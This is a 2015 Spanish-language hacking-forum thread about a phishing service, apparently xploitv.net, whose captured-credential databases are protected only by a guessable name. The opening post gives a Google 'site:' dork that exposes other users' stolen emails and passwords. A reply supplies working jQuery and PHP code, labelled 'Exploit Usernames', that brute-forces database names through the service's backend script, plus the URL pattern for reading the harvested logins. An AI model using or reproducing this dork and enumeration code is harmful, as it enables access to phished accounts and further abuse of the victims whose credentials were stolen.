Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: yack en Mayo 26, 2015, 04:56:25 PM

Título: Nadie sabe para quien trabaja!
Publicado por: yack en Mayo 26, 2015, 04:56:25 PM
Comienzo mi dia tranquilo y como soy amante de lo que respecta a ing. social (fakes/scam, engaños, phishing : Ojo con fines educativos claro esta!) enpece buscando con mi buscador preferido sitios en donde se pueda configurar un ataque de phishing, y me tope con xploitv.net creo yo que ya lleva mucho tiempo en el tema, pero bueno vamos a lo que respecta el tema, ps me di cuenta que solo basta con poner un nombre clave a tu base de datos (bd) y ps con ese nombre que supuestamente tu y solo tu debes saber, vizualizaras los correos y claves que hayas pescado.

decidí hacer una búsqueda con el dork site: en google

Código [Seleccionar]
site:http://xploitv.net/b=

y ps me resulto muy fácil leer todas las bases de datos que quise. si me preguntan si me interesan ps no me interesan por que no se de quien son ni a quien les pertenecen así que no he hecho nada malo.

(http://i62.tinypic.com/28kukxd.png)


y como es mi primer aporte en underc0de, ps decidí postearlo solo aquí.

Pd: si alguien lo postea en otro site por favor respete los créditos.
Saludos.
Título: Re:Nadie sabe para quien trabaja!
Publicado por: arthusu en Mayo 26, 2015, 11:08:11 PM
Se que es algo tonto pero a eso le puedes hacer fuerza bruta demasiado facil y seria mas eficiente que google:

(http://i.imgur.com/oRdzhDt.png)

finder_usernames.html

Código (php) [Seleccionar]
<script type="text/javascript" src="jQuery/js/jquery-2.1.4.min.js"></script>
<script type="text/javascript">
$("document").ready(function(){
$("#submit").click(function(e){
e.preventDefault();
var list_users = $("#usernames").val().split("\n");
$.each(list_users,function(index,username){
//console.log(username+ "\n");
$.get(
'usernames.php',
{usernames : username},
function(data) {
                    $('.resultados').append(username + ":" + data + '<br />');
                  },
                  "text"
);
});
});
});
</script>
<form action="" method="post">
<textarea cols="50" rows="20" id="usernames" name="usernames"></textarea>
<input type="submit" id="submit" value="Exploit Usernames" />
</form>
<p class="resultados"></p>

usernames.php

Código (php) [Seleccionar]

<?php
if(isset($_GET['usernames'])){
 echo file_get_contents("http://server5.lincehost.net/~neek/xploitv/script2.php?db={$_GET['usernames']}&action=count");
 }
?>


y para leerlos:

http://server5.lincehost.net/~neek/xploitv/script2.php?db=ElUSUARIO&action=read

o usar el servicio: http://xploitv.net/b=ELUSUARIO

donde c es el numero de usuarios

Saludos!
Título: Re:Nadie sabe para quien trabaja!
Publicado por: yack en Mayo 26, 2015, 11:16:35 PM
que te puedo decir brth ARTHUSU, no solo complementaste el post. genial.
saludos.
Título: Re:Nadie sabe para quien trabaja!
Publicado por: DeanW en Junio 04, 2015, 01:59:46 AM
Muy buen aporte muchas gracias me sirvio bastante  :)
Sólo texto | Texto con Imágenes